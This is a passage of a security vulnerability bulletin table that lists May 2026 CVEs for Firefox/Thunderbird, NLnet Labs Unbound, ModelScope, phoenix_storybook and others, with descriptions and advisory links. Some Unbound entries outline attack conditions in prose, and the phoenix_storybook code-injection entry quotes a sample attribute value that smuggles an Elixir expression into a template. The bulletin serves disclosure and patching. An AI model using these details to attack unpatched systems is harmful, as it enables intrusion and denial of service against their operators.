| ModelScope--ModelScope 1.25.0 | An issue was discovered in ModelScope 1.25.0 allowing attackers to execute arbitrary code via crafted module listed in the configuration file (dey_mini.yaml) under the key ['nnet']['module']. | 2026-05-19 | not yet calculated | CVE-2025-51427 | https://github.com/modelscope/modelscope/issues/1331 https://github.com/modelscope/modelscope/pull/1333 https://github.com/JIRUWOZHI/vulnerability-disclosure/blob/main/CVE-2025-51427/CVE_2025_51427.md |
| Mozilla--Firefox | Sandbox escape in Firefox and Firefox Focus for Android. This vulnerability was fixed in Firefox 151. | 2026-05-19 | not yet calculated | CVE-2026-8945 | https://bugzilla.mozilla.org/show_bug.cgi?id=2003171 https://www.mozilla.org/security/advisories/mfsa2026-46/ |
| Mozilla--Firefox | Incorrect boundary conditions in the Audio/Video: Web Codecs component. This vulnerability was fixed in Firefox 151, Firefox ESR 115.36, Firefox ESR 140.11, Thunderbird 151, and Thunderbird 140.11. | 2026-05-19 | not yet calculated | CVE-2026-8946 | https://bugzilla.mozilla.org/show_bug.cgi?id=2029070 https://www.mozilla.org/security/advisories/mfsa2026-46/ https://www.mozilla.org/security/advisories/mfsa2026-47/ https://www.mozilla.org/security/advisories/mfsa2026-48/ https://www.mozilla.org/security/advisories/mfsa2026-50/ https://www.mozilla.org/security/advisories/mfsa2026-51/ |
| Mozilla--Firefox | Use-after-free in the DOM: Bindings (WebIDL) component. This vulnerability was fixed in Firefox 151, Firefox ESR 115.36, Firefox ESR 140.11, Thunderbird 151, and Thunderbird 140.11. | 2026-05-19 | not yet calculated | CVE-2026-8947 | https://bugzilla.mozilla.org/show_bug.cgi?id=2038439 https://www.mozilla.org/security/advisories/mfsa2026-46/ https://www.mozilla.org/security/advisories/mfsa2026-47/ https://www.mozilla.org/security/advisories/mfsa2026-48/ https://www.mozilla.org/security/advisories/mfsa2026-50/ https://www.mozilla.org/security/advisories/mfsa2026-51/ |
| Mozilla--Firefox | Same-origin policy bypass in the DOM: Networking component. This vulnerability was fixed in Firefox 151 and Thunderbird 151. | 2026-05-19 | not yet calculated | CVE-2026-8948 | https://bugzilla.mozilla.org/show_bug.cgi?id=2038803 https://www.mozilla.org/security/advisories/mfsa2026-46/ https://www.mozilla.org/security/advisories/mfsa2026-50/ |
| Mozilla--Firefox | Integer overflow in the Widget: Win32 component. This vulnerability was fixed in Firefox 151, Firefox ESR 140.11, Thunderbird 151, and Thunderbird 140.11. | 2026-05-19 | not yet calculated | CVE-2026-8949 | https://bugzilla.mozilla.org/show_bug.cgi?id=1355639 https://www.mozilla.org/security/advisories/mfsa2026-46/ https://www.mozilla.org/security/advisories/mfsa2026-48/ https://www.mozilla.org/security/advisories/mfsa2026-50/ https://www.mozilla.org/security/advisories/mfsa2026-51/ |
| Mozilla--Firefox | Same-origin policy bypass in the Networking: HTTP component. This vulnerability was fixed in Firefox 151, Firefox ESR 140.11, Thunderbird 151, and Thunderbird 140.11. | 2026-05-19 | not yet calculated | CVE-2026-8950 | https://bugzilla.mozilla.org/show_bug.cgi?id=1965430 https://www.mozilla.org/security/advisories/mfsa2026-46/ https://www.mozilla.org/security/advisories/mfsa2026-48/ https://www.mozilla.org/security/advisories/mfsa2026-50/ https://www.mozilla.org/security/advisories/mfsa2026-51/ |
| Mozilla--Firefox | Spoofing issue in the Toolbar component in Firefox for Android. This vulnerability was fixed in Firefox 151. | 2026-05-19 | not yet calculated | CVE-2026-8951 | https://bugzilla.mozilla.org/show_bug.cgi?id=2018513 https://www.mozilla.org/security/advisories/mfsa2026-46/ |
| Mozilla--Firefox | Privilege escalation in the Application Update component. This vulnerability was fixed in Firefox 151 and Thunderbird 151. | 2026-05-19 | not yet calculated | CVE-2026-8952 | https://bugzilla.mozilla.org/show_bug.cgi?id=2021727 https://www.mozilla.org/security/advisories/mfsa2026-46/ https://www.mozilla.org/security/advisories/mfsa2026-50/ |
| Mozilla--Firefox | Sandbox escape due to use-after-free in the Disability Access APIs component. This vulnerability was fixed in Firefox 151, Firefox ESR 115.36, Firefox ESR 140.11, Thunderbird 151, and Thunderbird 140.11. | 2026-05-19 | not yet calculated | CVE-2026-8953 | https://bugzilla.mozilla.org/show_bug.cgi?id=2029511 https://www.mozilla.org/security/advisories/mfsa2026-46/ https://www.mozilla.org/security/advisories/mfsa2026-47/ https://www.mozilla.org/security/advisories/mfsa2026-48/ https://www.mozilla.org/security/advisories/mfsa2026-50/ https://www.mozilla.org/security/advisories/mfsa2026-51/ |
| Mozilla--Firefox | Incorrect boundary conditions, integer overflow in the Audio/Video component. This vulnerability was fixed in Firefox 151, Firefox ESR 140.11, Thunderbird 151, and Thunderbird 140.11. | 2026-05-19 | not yet calculated | CVE-2026-8954 | https://bugzilla.mozilla.org/show_bug.cgi?id=2030747 https://www.mozilla.org/security/advisories/mfsa2026-46/ https://www.mozilla.org/security/advisories/mfsa2026-48/ https://www.mozilla.org/security/advisories/mfsa2026-50/ https://www.mozilla.org/security/advisories/mfsa2026-51/ |
| Mozilla--Firefox | Privilege escalation in the DOM: Workers component. This vulnerability was fixed in Firefox 151, Firefox ESR 140.11, Thunderbird 151, and Thunderbird 140.11. | 2026-05-19 | not yet calculated | CVE-2026-8955 | https://bugzilla.mozilla.org/show_bug.cgi?id=2031064 https://www.mozilla.org/security/advisories/mfsa2026-46/ https://www.mozilla.org/security/advisories/mfsa2026-48/ https://www.mozilla.org/security/advisories/mfsa2026-50/ https://www.mozilla.org/security/advisories/mfsa2026-51/ |
| Mozilla--Firefox | Integer overflow in the Networking: JAR component. This vulnerability was fixed in Firefox 151, Firefox ESR 140.11, Thunderbird 151, and Thunderbird 140.11. | 2026-05-19 | not yet calculated | CVE-2026-8956 | https://bugzilla.mozilla.org/show_bug.cgi?id=2032427 https://www.mozilla.org/security/advisories/mfsa2026-46/ https://www.mozilla.org/security/advisories/mfsa2026-48/ https://www.mozilla.org/security/advisories/mfsa2026-50/ https://www.mozilla.org/security/advisories/mfsa2026-51/ |
| Mozilla--Firefox | Privilege escalation in the Enterprise Policies component. This vulnerability was fixed in Firefox 151, Firefox ESR 140.11, Thunderbird 151, and Thunderbird 140.11. | 2026-05-19 | not yet calculated | CVE-2026-8957 | https://bugzilla.mozilla.org/show_bug.cgi?id=2033850 https://www.mozilla.org/security/advisories/mfsa2026-46/ https://www.mozilla.org/security/advisories/mfsa2026-48/ https://www.mozilla.org/security/advisories/mfsa2026-50/ https://www.mozilla.org/security/advisories/mfsa2026-51/ |
| Mozilla--Firefox | Information disclosure, sandbox escape in the Security: Process Sandboxing component. This vulnerability was fixed in Firefox 151, Firefox ESR 140.11, Thunderbird 151, and Thunderbird 140.11. | 2026-05-19 | not yet calculated | CVE-2026-8958 | https://bugzilla.mozilla.org/show_bug.cgi?id=2034713 https://www.mozilla.org/security/advisories/mfsa2026-46/ https://www.mozilla.org/security/advisories/mfsa2026-48/ https://www.mozilla.org/security/advisories/mfsa2026-50/ https://www.mozilla.org/security/advisories/mfsa2026-51/ |
| Mozilla--Firefox | Sandbox escape due to incorrect boundary conditions in the Widget: Win32 component. This vulnerability was fixed in Firefox 151, Firefox ESR 140.11, Thunderbird 151, and Thunderbird 140.11. | 2026-05-19 | not yet calculated | CVE-2026-8959 | https://bugzilla.mozilla.org/show_bug.cgi?id=2034754 https://www.mozilla.org/security/advisories/mfsa2026-46/ https://www.mozilla.org/security/advisories/mfsa2026-48/ https://www.mozilla.org/security/advisories/mfsa2026-50/ https://www.mozilla.org/security/advisories/mfsa2026-51/ |
| Mozilla--Firefox | Spoofing issue in WebExtensions. This vulnerability was fixed in Firefox 151 and Thunderbird 151. | 2026-05-19 | not yet calculated | CVE-2026-8960 | https://bugzilla.mozilla.org/show_bug.cgi?id=1940116 https://www.mozilla.org/security/advisories/mfsa2026-46/ https://www.mozilla.org/security/advisories/mfsa2026-50/ |
| Mozilla--Firefox | Spoofing issue in the Form Autofill component. This vulnerability was fixed in Firefox 151, Firefox ESR 140.11, Thunderbird 151, and Thunderbird 140.11. | 2026-05-19 | not yet calculated | CVE-2026-8961 | https://bugzilla.mozilla.org/show_bug.cgi?id=1962625 https://www.mozilla.org/security/advisories/mfsa2026-46/ https://www.mozilla.org/security/advisories/mfsa2026-48/ https://www.mozilla.org/security/advisories/mfsa2026-50/ https://www.mozilla.org/security/advisories/mfsa2026-51/ |
| Mozilla--Firefox | Mitigation bypass in the DOM: Security component. This vulnerability was fixed in Firefox 151, Firefox ESR 140.11, Thunderbird 151, and Thunderbird 140.11. | 2026-05-19 | not yet calculated | CVE-2026-8962 | https://bugzilla.mozilla.org/show_bug.cgi?id=2004804 https://www.mozilla.org/security/advisories/mfsa2026-46/ https://www.mozilla.org/security/advisories/mfsa2026-48/ https://www.mozilla.org/security/advisories/mfsa2026-50/ https://www.mozilla.org/security/advisories/mfsa2026-51/ |
| Mozilla--Firefox | Spoofing issue in the Web Speech component. This vulnerability was fixed in Firefox 151 and Thunderbird 151. | 2026-05-19 | not yet calculated | CVE-2026-8963 | https://bugzilla.mozilla.org/show_bug.cgi?id=2021222 https://www.mozilla.org/security/advisories/mfsa2026-46/ https://www.mozilla.org/security/advisories/mfsa2026-50/ |
| Mozilla--Firefox | Spoofing issue in the Popup Blocker component. This vulnerability was fixed in Firefox 151 and Thunderbird 151. | 2026-05-19 | not yet calculated | CVE-2026-8964 | https://bugzilla.mozilla.org/show_bug.cgi?id=2025170 https://www.mozilla.org/security/advisories/mfsa2026-46/ https://www.mozilla.org/security/advisories/mfsa2026-50/ |
| Mozilla--Firefox | Information disclosure in the DOM: Security component. This vulnerability was fixed in Firefox 151 and Thunderbird 151. | 2026-05-19 | not yet calculated | CVE-2026-8965 | https://bugzilla.mozilla.org/show_bug.cgi?id=2025740 https://www.mozilla.org/security/advisories/mfsa2026-46/ https://www.mozilla.org/security/advisories/mfsa2026-50/ |
| Mozilla--Firefox | Information disclosure in the IP Protection component. This vulnerability was fixed in Firefox 151 and Thunderbird 151. | 2026-05-19 | not yet calculated | CVE-2026-8966 | https://bugzilla.mozilla.org/show_bug.cgi?id=2025849 https://www.mozilla.org/security/advisories/mfsa2026-46/ https://www.mozilla.org/security/advisories/mfsa2026-50/ |
| Mozilla--Firefox | Information disclosure in the Graphics: WebGPU component. This vulnerability was fixed in Firefox 151 and Thunderbird 151. | 2026-05-19 | not yet calculated | CVE-2026-8967 | https://bugzilla.mozilla.org/show_bug.cgi?id=2027173 https://www.mozilla.org/security/advisories/mfsa2026-46/ https://www.mozilla.org/security/advisories/mfsa2026-50/ |
| Mozilla--Firefox | Denial-of-service due to invalid pointer in the Audio/Video: Web Codecs component. This vulnerability was fixed in Firefox 151, Firefox ESR 140.11, Thunderbird 151, and Thunderbird 140.11. | 2026-05-19 | not yet calculated | CVE-2026-8968 | https://bugzilla.mozilla.org/show_bug.cgi?id=2030467 https://www.mozilla.org/security/advisories/mfsa2026-46/ https://www.mozilla.org/security/advisories/mfsa2026-48/ https://www.mozilla.org/security/advisories/mfsa2026-50/ https://www.mozilla.org/security/advisories/mfsa2026-51/ |
| Mozilla--Firefox | Mitigation bypass in the DOM: Security component. This vulnerability was fixed in Firefox 151 and Thunderbird 151. | 2026-05-19 | not yet calculated | CVE-2026-8969 | https://bugzilla.mozilla.org/show_bug.cgi?id=2031123 https://www.mozilla.org/security/advisories/mfsa2026-46/ https://www.mozilla.org/security/advisories/mfsa2026-50/ |
| Mozilla--Firefox | Privilege escalation in the Security component. This vulnerability was fixed in Firefox 151, Firefox ESR 140.11, Thunderbird 151, and Thunderbird 140.11. | 2026-05-19 | not yet calculated | CVE-2026-8970 | https://bugzilla.mozilla.org/show_bug.cgi?id=2032174 https://www.mozilla.org/security/advisories/mfsa2026-46/ https://www.mozilla.org/security/advisories/mfsa2026-48/ https://www.mozilla.org/security/advisories/mfsa2026-50/ https://www.mozilla.org/security/advisories/mfsa2026-51/ |
| Mozilla--Firefox | Same-origin policy bypass in the Networking: JAR component. This vulnerability was fixed in Firefox 151 and Thunderbird 151. | 2026-05-19 | not yet calculated | CVE-2026-8971 | https://bugzilla.mozilla.org/show_bug.cgi?id=2032604 https://www.mozilla.org/security/advisories/mfsa2026-46/ https://www.mozilla.org/security/advisories/mfsa2026-50/ |
| Mozilla--Firefox | Privilege escalation in the WebRTC: Audio/Video component. This vulnerability was fixed in Firefox 151 and Thunderbird 151. | 2026-05-19 | not yet calculated | CVE-2026-8972 | https://bugzilla.mozilla.org/show_bug.cgi?id=2033275 https://www.mozilla.org/security/advisories/mfsa2026-46/ https://www.mozilla.org/security/advisories/mfsa2026-50/ |
| Mozilla--Firefox | Memory safety bugs present in Thunderbird 150. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code. This vulnerability was fixed in Firefox 151 and Thunderbird 151. | 2026-05-19 | not yet calculated | CVE-2026-8973 | Memory safety bugs fixed in Thunderbird 151 https://www.mozilla.org/security/advisories/mfsa2026-46/ https://www.mozilla.org/security/advisories/mfsa2026-50/ |
| Mozilla--Firefox | Memory safety bugs present in Thunderbird 140.10 and Thunderbird 150. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code. This vulnerability was fixed in Firefox 151, Firefox ESR 140.11, Thunderbird 151, and Thunderbird 140.11. | 2026-05-19 | not yet calculated | CVE-2026-8974 | Memory safety bugs fixed in Thunderbird 140.11 and Thunderbird 151 https://www.mozilla.org/security/advisories/mfsa2026-46/ https://www.mozilla.org/security/advisories/mfsa2026-48/ https://www.mozilla.org/security/advisories/mfsa2026-50/ https://www.mozilla.org/security/advisories/mfsa2026-51/ |
| Mozilla--Firefox | Memory safety bugs present in Thunderbird 140.10 and Thunderbird 150. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code. This vulnerability was fixed in Firefox 151, Firefox ESR 115.36, Firefox ESR 140.11, Thunderbird 151, and Thunderbird 140.11. | 2026-05-19 | not yet calculated | CVE-2026-8975 | Memory safety bugs fixed in Thunderbird 140.11 and Thunderbird 151 https://www.mozilla.org/security/advisories/mfsa2026-46/ https://www.mozilla.org/security/advisories/mfsa2026-47/ https://www.mozilla.org/security/advisories/mfsa2026-48/ https://www.mozilla.org/security/advisories/mfsa2026-50/ https://www.mozilla.org/security/advisories/mfsa2026-51/ |
| Mozilla--Firefox for iOS | Firefox for iOS hosted Reader mode on an unauthenticated local web server, allowing another application on the same device to request arbitrary URLs and receive the response rendered with the signed-in user's cookies. This vulnerability was fixed in Firefox for iOS 151.0. | 2026-05-19 | not yet calculated | CVE-2026-8706 | https://bugzilla.mozilla.org/show_bug.cgi?id=2036618 https://www.mozilla.org/security/advisories/mfsa2026-49/ |
| ngrok--ngrok v4.3.3 and 5.0.0-beta.2 | ngrok v4.3.3 and 5.0.0-beta.2 is vulnerable to Command Injection. | 2026-05-18 | not yet calculated | CVE-2025-57282 | https://www.npmjs.com https://gist.github.com/Dremig/90c2a0a2f85b0921f10e0bb3192a0c23 |
| NLnet Labs--Unbound | NLnet Labs Unbound 1.6.2 up to and including version 1.25.0 has a denial of service vulnerability when compiled with DNSCrypt support ('--enable-dnscrypt'). A bad DNSCrypt query could underflow Unbound's DNSCrypt packet reading procedure that may lead to heap overflow. A malicious actor can exploit the vulnerability with a single bad DNSCrypt query that its decrypted plaintext consists entirely of '0x00' bytes and does not contain the expected '0x80' marker. Unbound would then start reading more bytes than necessary until it finds a non-'0x00' byte. Based on the underlying memory allocator and the memory layout, it could lead to heap overflow while reading followed by a crash. Likelihood of a crash is low, since it relies heavily on the underlying memory allocator and the memory layout. If the heap overflow does not happen, Unbound's later packet checks will deny the packet. Unbound 1.25.1 contains a patch with a fix to bound reading in the given buffer space. | 2026-05-20 | not yet calculated | CVE-2026-32792 | https://www.nlnetlabs.nl/downloads/unbound/CVE-2026-32792.txt |
| NLnet Labs--Unbound | NLnet Labs Unbound 1.19.1 up to and including version 1.25.0 has a vulnerability in the DNSSEC validator that enables denial of service and possible remote code execution as a result of deep copying a data structure and erroneously overwriting a destination pointer. An adversary can exploit the vulnerability by controlling a malicious signed zone and querying a vulnerable Unbound. When DS sub-queries need to suspend validation due to NSEC3 computational budget exhaustion (introduced in Unbound 1.19.1), Unbound deep-copies response messages to preserve them across memory region teardown. A struct-assignment bug overwrites the destination's pointer with the source's pointer. After the sub-query region is freed, the resumed validator dereferences this dangling pointer, triggering a crash or potentially enabling arbitrary code execution. Unbound 1.25.1 contains a patch with a fix to preserve the correct pointer when deep copying the data structure. | 2026-05-20 | not yet calculated | CVE-2026-33278 | https://www.nlnetlabs.nl/downloads/unbound/CVE-2026-33278.txt |
| NLnet Labs--Unbound | NLnet Labs Unbound 1.16.2 up to and including version 1.25.0 has a vulnerability of the 'ghost domain names' family of attacks that could extend the ghost domain window by up to one cached TTL configured value. Similar to other 'ghost domain names' attacks, an adversary needs to control a (ghost) zone and be able to query a vulnerable Unbound. A single client NS query can cause Unbound to overwrite the cached expired parent-side referral NS rrset with the child-side apex NS rrset and essentially extend the ghost domain window by up to one cached TTL configured value ('cache-max-ttl'). In configurations where 'harden-referral-path: yes' is used (non-default configuration), no client NS query is required since Unbound implicitly performs that query. Unbound 1.25.1 contains a patch with a fix that does not allow extension of TTLs for (parent) NS records regardless of their trust. | 2026-05-20 | not yet calculated | CVE-2026-40622 | https://www.nlnetlabs.nl/downloads/unbound/CVE-2026-40622.txt |
| NLnet Labs--Unbound | NLnet Labs Unbound up to and including version 1.25.0 is vulnerable to a degradation of service attack related to parsing long lists of incoming EDNS options. An adversary sending queries with too many EDNS options can hold Unbound threads hostage while they are parsing and creating internal data structures for the options. Coordinated attacks can result in degradation and/or denial of service. Unbound 1.25.1 contains a patch with a fix to limit acceptable incoming EDNS options (100). | 2026-05-20 | not yet calculated | CVE-2026-41292 | https://www.nlnetlabs.nl/downloads/unbound/CVE-2026-41292.txt |
| NLnet Labs--Unbound | NLnet Labs Unbound up to and including version 1.25.0 has a vulnerability in the jostle logic that could defeat its purpose and degrade resolution performance. Retransmits of the same query could renew the age of slow running queries and not allow the jostle logic to see them as aged and potential targets for replacement with new queries. An adversary who can query a vulnerable Unbound and who can control a domain name server that replies slowly and/or maliciously to Unbound's queries can exploit the vulnerability and degrade the resolution performance of Unbound. When Unbound's 'num-queries-per-thread' reaches its limit, the jostle logic kicks in. When a new query comes in, half of the available queries that are also slow to resolve are candidates for replacement. The vulnerability then happens because duplicate queries that need resolution would skew the aging result by using the timestamp of the latest duplicate query instead of the original one that started the resolution effort. Cache and local data response performance remains unaffected. Coordinated attacks could raise this to a denial of resolution service. Unbound 1.25.1 contains a patch with a fix to attach an initial, non-updatable start time for incoming queries that allow the jostle logic to work as intended. | 2026-05-20 | not yet calculated | CVE-2026-42534 | https://www.nlnetlabs.nl/downloads/unbound/CVE-2026-42534.txt |
| NLnet Labs--Unbound | NLnet Labs Unbound up to and including version 1.25.0 has a vulnerability in the DNSSEC validator where the code path to consult the negative cache for DS records does not take into account the limit on NSEC3 hash calculations introduced in 1.19.1. This leads to degradation of service during the attack. An adversary that controls a DNSSEC signed zone can exploit this by signing NSEC3 records with acceptably high iterations for child delegations and querying a vulnerable Unbound. Unbound will keep performing the allowed hash calculations on the NSEC3 records and will not limit the work by the mitigation introduced in 1.19.1. As a side effect, a global lock for the negative cache will be held for the duration of the hashing, blocking other threads that need to consult the negative cache. Coordinated attacks could raise the vulnerability to denial of service. Unbound 1.25.1 contains a patch with a fix to bound the vulnerable code path with the existing limit for NSEC3 hash calculations. | 2026-05-20 | not yet calculated | CVE-2026-42923 | https://www.nlnetlabs.nl/downloads/unbound/CVE-2026-42923.txt |
| NLnet Labs--Unbound | NLnet Labs Unbound 1.14.0 up to and including version 1.25.0 has a vulnerability that results in heap overflow when encoding multiple NSID and/or DNS Cookie EDNS and/or EDNS Padding options in the reply packet. The relevant options ('nsid', 'answer-cookie', 'pad-responses' (default)) need to be enabled for the vulnerability to be exploited. An adversary who can query Unbound can exploit the vulnerability by attaching multiple NSID and/or DNS Cookie EDNS and/or EDNS Padding options to the query. A flaw in the size calculation of the EDNS field truncates the correct value which allows the encoder to overflow the available space when writing. Those two combined lead to a heap overflow write of Unbound controlled data and eventually a crash. Unbound 1.25.1 contains a patch with a fix to de-duplicate the EDNS options and a fix to prevent truncation of the EDNS field size calculation. | 2026-05-20 | not yet calculated | CVE-2026-42944 | https://www.nlnetlabs.nl/downloads/unbound/CVE-2026-42944.txt |
| NLnet Labs--Unbound | NLnet Labs Unbound up to and including version 1.25.0 has a denial of service vulnerability in the DNSSEC validator that can lead to a crash given malicious upstream replies. When Unbound constructs chase-reply messages for validation, the code uses the wrong counter to calculate write offsets for ADDITIONAL section rrsets. DNAME duplication could increase the ANSWER section count and authority filtering could decrease the AUTHORITY section count and create an uninitialized array slot. Combining these two, the validator later dereferences this uninitialized pointer, causing an immediate process crash. An adversary controlling a DNSSEC-signed domain can trigger this bug with a single query by configuring a DNAME chain with unsigned CNAMEs and a response containing unsigned AUTHORITY records alongside signed ADDITIONAL glue records. Unbound 1.25.1 contains a patch with a fix to use the proper counters to calculate the write offsets. | 2026-05-20 | not yet calculated | CVE-2026-42959 | https://www.nlnetlabs.nl/downloads/unbound/CVE-2026-42959.txt |
| NLnet Labs--Unbound | NLnet Labs Unbound up to and including version 1.25.0 is vulnerable to poisoning via promiscuous records for the authority section. Promiscuous RRSets that complement DNS replies in the authority section can be used to trick Unbound to cache such records. If an adversary is able to attach such records in a reply (i.e., spoofed packet, fragmentation attack) he would be able to poison Unbound's cache. A malicious actor can exploit the possible poisonous effect by injecting RRSets other than NS that are also accompanied by address records in a reply, for example MX. This could be achieved by trying to spoof a reply packet or fragmentation attacks. Unbound would then accept the relative address records in the additional section and cache them if the authority RRSet has enough trust at this point, i.e., in-zone data for the delegation point. Unbound 1.25.1 contains a patch with a fix that disregards address records from the additional section if they are not explicitly relevant only to authority NS records, mitigating the possible poison effect. This is a complement fix to CVE-2025-11411. | 2026-05-20 | not yet calculated | CVE-2026-42960 | https://www.nlnetlabs.nl/downloads/unbound/CVE-2026-42960.txt |
| NLnet Labs--Unbound | NLnet Labs Unbound up to and including version 1.25.0 has a vulnerability when handling replies with very large RRsets that Unbound needs to perform name compression for. Malicious upstream responses with very large RRsets with records that don't share a suffix above the root can cause Unbound to spend a considerable time applying name compression to downstream replies. This can lead to degraded performance and eventually denial of service in well orchestrated attacks. An adversary can exploit the vulnerability by querying Unbound for the specially crafted contents of a malicious zone with very large RRsets. Before Unbound replies to the query it will try to apply name compression which was an unbounded operation that could lock the CPU until the whole packet was complete. A compression limit was introduced in 1.21.1 for this but it didn't account for the case where records would not share any suffix above the root. That causes Unbound to go in a different code path because of the compression tree lookup failure and eventually not increment the compression counter for those operations. Unbound 1.25.1 contains a patch with a fix that increments the compression counter regardless of the compression tree lookup. This is a complement fix to CVE-2024-8508. | 2026-05-20 | not yet calculated | CVE-2026-44390 | https://www.nlnetlabs.nl/downloads/unbound/CVE-2026-44390.txt |
| NLnet Labs--Unbound | NLnet Labs Unbound 1.14.0 up to and including version 1.25.0 has a locking inconsistency vulnerability that when certain conditions are met (multi-threaded, RPZ XFR reload, RPZ zone with 'rpz-nsip'/'rpz-nsdname' triggers) it could result in heap use-after-free and eventual crash. An adversary can exploit the vulnerability if conditions are first met on a vulnerable Unbound, i.e., multi-threaded, an RPZ zone with 'rpz-nsip'/'rpz-nsdname' triggers and an ongoing XFR for that RPZ zone. Local RPZ files do not trigger the vulnerability. If the timing is right and an XFR happens at the same time another thread needs to read that RPZ zone, the reader may not hold the lock long enough and the thread applying the XFR may free objects that the reader is about to walk causing the use-after-free. Unbound 1.25.1 contains a patch with a fix to the locking code. | 2026-05-20 | not yet calculated | CVE-2026-44608 | https://www.nlnetlabs.nl/downloads/unbound/CVE-2026-44608.txt |
| NOVUS -- AirGate 4G | Incorrect access control in the /uci/get/ endpoint of NOVUS AirGate 4G firmware v1.1.16 allows unauthenticated attackers to obtain administrator credentials via a crafted POST request. | 2026-05-18 | not yet calculated | CVE-2023-24215 | http://airgate.com http://novus.com https://github.com/sql3t0/cve-disclosures/blob/main/00_-_CVE-2023-24215.md |
| Offline Hospital Management System--Offline Hospital Management System 5.3.0 | Offline Hospital Management System 5.3.0 allows remote code execution due to an improper Electron renderer configuration. The application enables Node.js integration while disabling context isolation, allowing JavaScript executed in the renderer process to access Node.js APIs and execute arbitrary operating system commands. | 2026-05-18 | not yet calculated | CVE-2026-26462 | https://sourceforge.net/projects/hospital-management-system/files/ https://medium.com/@husaainpalh/remote-code-execution-in-offline-hospital-management-system-cve-2026-26462-bc7ac54314c4 |
| OpENer--OpENer v2.3-558-g1e99582 | OpENer v2.3-558-g1e99582 contains an out-of-bounds read vulnerability in the Common Packet Format (CPF) parser, specifically in CreateCommonPacketFormatStructure() in source/src/enet_encap/cpf.c. A crafted ENIP/CPF message can supply an attacker-controlled item_count value that is not consistently validated against the remaining data_length of the CPF slice | 2026-05-18 | not yet calculated | CVE-2026-38719 | https://github.com/EIPStackGroup/OpENer https://github.com/EIPStackGroup/OpENer/issues/558 |
| Perforce--P4 (Helix Core) | A Remote Code Execution vulnerability in P4 (Helix Core) Server's Command-Line Client, prior to the 2025.2 Patch 2, has been fixed to address potential security risks. | 2026-05-18 | not yet calculated | CVE-2026-6902 | https://portal.perforce.com/s/cve/a91Qi000002zJB3IAM/code-injection-in-perforce-helix-core |
| phenixdigital--phoenix_storybook | Authorization Bypass Through User-Controlled Key vulnerability in phenixdigital phoenix_storybook allows cross-session PubSub topic injection via a URL query parameter. 'Elixir.PhoenixStorybook.Story.ComponentIframeLive':handle_params/3 in lib/phoenix_storybook/live/story/component_iframe_live.ex reads a PubSub topic directly from params["topic"] and broadcasts {:component_iframe_pid, self()} on it with no check that the topic belongs to the requesting session. The shared PhoenixStorybook.PubSub is used to coordinate playground LiveViews with their iframes: a playground subscribes to a session-specific topic and uses the received iframe pid to direct subsequent control messages (variation state, theme switches, extra-assign payloads) via send/2. Because the iframe trusts the query parameter, an attacker who loads /storybook/iframe/<story>?topic=<victim_topic> causes their iframe process pid to be announced on the victim's topic. The victim's playground then addresses its private messages to the attacker's iframe process. This issue affects phoenix_storybook from 0.4.0 before 1.1.0. | 2026-05-20 | not yet calculated | CVE-2026-47068 | https://github.com/phenixdigital/phoenix_storybook/security/advisories/GHSA-mrhx-6pw9-q5fh https://cna.erlef.org/cves/CVE-2026-47068.html https://osv.dev/vulnerability/EEF-CVE-2026-47068 https://github.com/phenixdigital/phoenix_storybook/commit/6ee03f1c738d4436dde1b066cf65c80663d489f5 |
| phenixdigital--phoenix_storybook | Code Injection vulnerability in phenixdigital phoenix_storybook allows unauthenticated remote code execution via unsanitized attribute value interpolation in HEEx template generation. The psb-assign WebSocket event handler in 'Elixir.PhoenixStorybook.Story.PlaygroundPreviewLive':handle_event/3 accepts arbitrary attribute names and values from unauthenticated clients. These values are passed to 'Elixir.PhoenixStorybook.Helpers.ExtraAssignsHelpers':handle_set_variation_assign/3, which stores them verbatim. When rendering, 'Elixir.PhoenixStorybook.Rendering.ComponentRenderer':attributes_markup/1 interpolates binary attribute values directly into a HEEx template string as name="<val>" without escaping double quotes or HEEx expression delimiters. An attacker can supply a value containing a closing quote followed by a HEEx expression block (e.g. foo" injected={EXPR} bar="), which causes EXPR to be treated as an inline Elixir expression. The resulting template is compiled via EEx.compile_string/2 and executed via Code.eval_quoted_with_env/3 with full Kernel imports and no sandbox, giving the attacker arbitrary code execution on the server. This issue affects phoenix_storybook from 0.5.0 before 1.1.0. | 2026-05-20 | not yet calculated | CVE-2026-8467 | https://github.com/phenixdigital/phoenix_storybook/security/advisories/GHSA-55hg-8qxv-qj4p https://cna.erlef.org/cves/CVE-2026-8467.html https://osv.dev/vulnerability/EEF-CVE-2026-8467 https://github.com/phenixdigital/phoenix_storybook/commit/56ab8464d4375fa52db806148a06cce126ad481d |
| phenixdigital--phoenix_storybook | Allocation of Resources Without Limits or Throttling vulnerability in phenixdigital phoenix_storybook allows unauthenticated denial-of-service via BEAM atom table exhaustion. Multiple LiveView event handlers convert user-supplied event parameter strings to atoms using String.to_atom/1 without validation: 'Elixir.PhoenixStorybook.ExtraAssignsHelpers':handle_set_variation_assign/3 interns every key of the psb-assign params map; 'Elixir.PhoenixStorybook.ExtraAssignsHelpers':handle_toggle_variation_assign/3 interns the "attr" value from psb-toggle events; 'Elixir.PhoenixStorybook.ExtraAssignsHelpers':to_variation_id/2 interns elements of "variation_id"; and 'Elixir.PhoenixStorybook.ExtraAssignsHelpers':to_value/4 interns raw string values for attributes declared as :atom or :boolean. BEAM atoms are never garbage-collected, so each unique attacker-controlled string is a permanent allocation. Once the atom table ceiling (~1,048,576 atoms) is reached, the entire BEAM node aborts, taking down all applications running on it. This issue affects phoenix_storybook from 0.2.0 before 1.1.0. | 2026-05-20 | not yet calculated | CVE-2026-8469 | https://github.com/phenixdigital/phoenix_storybook/security/advisories/GHSA-833p-95jq-929q https://cna.erlef.org/cves/CVE-2026-8469.html https://osv.dev/vulnerability/EEF-CVE-2026-8469 https://github.com/phenixdigital/phoenix_storybook/commit/96d524690af0fe197a49f60d18e564a620b9ef81 |
